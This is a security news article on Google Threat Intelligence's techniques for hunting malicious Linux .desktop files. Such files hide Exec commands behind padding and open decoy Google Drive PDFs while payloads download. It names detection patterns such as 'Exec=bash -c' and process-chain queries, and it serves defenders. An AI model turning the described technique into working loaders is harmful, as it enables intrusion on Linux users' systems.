Google Threat Intelligence Releases Actionable Threat Hunting Technique for Malicious .desktop Files

Google Threat Intelligence has unveiled a series of sophisticated threat hunting techniques to detect malicious .desktop files, a novel attack vector leveraged by threat actors to compromise systems.

Initially documented by Zscaler researchers in 2023, this technique involves the abuse of .desktop files-plain text configuration files used to define application launch behavior in Linux desktop environments-to execute malicious commands.

A recent surge of such files uploaded to Google Threat Intelligence prompted an in-depth analysis, resulting in actionable strategies for identifying and mitigating these threats.

This discovery underscores the evolving tactics of cybercriminals who obfuscate their intent with junk code and exploit legitimate system processes to deploy malware, often using Google Drive-hosted PDFs as distractions while subsequent malicious payloads are downloaded.

A Persistent Threat to Linux Systems

The structure of .desktop files, adhering to the Desktop Entry Specification, typically includes sections like [Desktop Entry] with keys such as Name, Comment, Exec, and Icon, making them portable across Linux distributions.

However, the malicious variants identified by Google Threat Intelligence deviate starkly from the norm.

These files often start with thousands of lines of ‘#’ characters interwoven with legitimate content to obscure their true purpose.

Upon execution, the ‘Exec’ variable triggers commands that may open seemingly innocuous PDFs via Google Drive using system utilities like xdg-open, which in turn delegates to environment-specific processes such as exo-open in XFCE, gio open in GNOME, or kde-open in KDE.

In Google’s sandbox analysis Report, the process chain-xdg-open to exo-open to exo-helper-2-reveals how URLs are opened in default browsers like Firefox, while covert malware stages are deployed.

This intricate abuse of standard Linux behavior highlights the need for robust detection mechanisms, which Google Threat Intelligence addresses through targeted queries and behavioral analysis.

Defenders with Precise Detection Queries

To empower defenders, Google Threat Intelligence provides several hunting queries focusing on process behaviors and file content.

One approach targets the final process in the execution chain, exo-helper-2, by searching for arguments like “–launch WebBrowser” alongside Google Drive URLs, which can indicate suspicious activity.

Broader queries encompass processes across desktop environments, combining terms like xdg-open, exo-open, and environment-specific commands to capture URL-opening behaviors tied to malicious .desktop files.

Additionally, queries leveraging commands executed by xdg-open, such as “/usr/bin/grep -i ^xfce_desktop_window” or “/usr/bin/xprop -root”, help identify related samples when paired with indicators like Google Drive URLs or PDF downloads.

For generic detection, searching for the “[Desktop Entry]” string at the file’s start or specific content patterns like “Exec=bash -c” offers a way to uncover potential threats, including those acting as downloaders or loaders for further malicious payloads like miner-related ELF files.

The following table lists recent samples uploaded in 2025, potentially linked to the Zscaler-reported campaign, though attribution remains unconfirmed.

Note that the upload country does not necessarily indicate the victim’s location due to possible proxy use.

Indicators of Compromise (IoCs)

Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!